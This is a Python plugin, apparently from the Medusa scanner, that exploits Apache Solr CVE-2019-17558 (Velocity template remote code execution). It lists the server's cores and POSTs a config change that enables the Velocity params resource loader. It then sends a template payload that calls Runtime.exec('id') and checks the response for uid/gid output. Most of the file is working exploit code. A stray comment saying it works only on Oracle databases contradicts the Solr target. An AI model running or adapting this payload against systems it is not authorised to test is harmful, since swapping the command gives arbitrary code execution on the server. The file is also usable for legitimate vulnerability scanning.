#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
注意！只能对oracle数据库起作用
'''
__author__ = 'Ascotbe'
__times__ = '2019/10/13 22:12 PM'
import requests
import json
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,ErrorHandling
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="CVE-2019-17558" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['create_date']  = "2020-1-3"  # 插件编辑时间
        self.info['disclosure']='2019-12-30'#漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "SolrVelocityTemplateRemoteCodeExecutionVulnerability"  # 插件名称
        self.info['name'] ='SolrVelocity模板远程代码执行漏洞' #漏洞名称
        self.info['affects'] = "Solr"  # 漏洞组件
        self.info['desc_content'] = "由于更新修复不完全，导致漏洞再次被利用"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['suggest'] = "尽快升级最新系统"  # 修复建议
        self.info['version'] = "5.0.0 <= Apache Solr <= 8.3.1"  # 这边填漏洞影响的版本
        self.info['details'] = Medusa  # 结果


payload1='''{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}'''

def medusa(**kwargs)->None:
    url=kwargs.get("Url")#获取传入的url参数
    Headers=kwargs.get("Headers")#获取传入的头文件
    proxies=kwargs.get("Proxies")#获取传入的代理参数
    try:
        Headers1=Headers
        Headers1['Content-Type']='application/x-www-form-urlencoded'
        payload_url=url+'/solr/admin/cores'
        step1 =requests.get(payload_url, timeout=6, proxies=proxies,headers = Headers1).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x
            payload = "/solr/"+name+"/config"
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
            payload_url1 = url+ payload
            payload_url2 = url + payload2
            payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
            Headers2 = Headers
            Headers2['Content-Type']='application/json'
            resp = requests.post(payload_url1,data=payload_data,headers=Headers2, proxies=proxies,timeout=6, verify=False)
            resp2 = requests.get(payload_url2, headers=Headers1, timeout=6,proxies=proxies, verify=False)
            con2 = resp2.text
            cod2=resp2.status_code
            if con2.find("uid=") != -1 and con2.find("groups=") != -1 and con2.find("gid=") != -1 and cod2==200:
                Medusa = "{} 存在SolrVelocity模板远程代码执行漏洞(CVE-2019-17558)\r\n验证数据:\r\n使用Payload:\r\n{}回显内容:{}\r\n".format(url,payload_url2,con2)
                _t=VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, resp2,**kwargs).Write()  # 传入url和扫描到的数据
                WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l =ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类

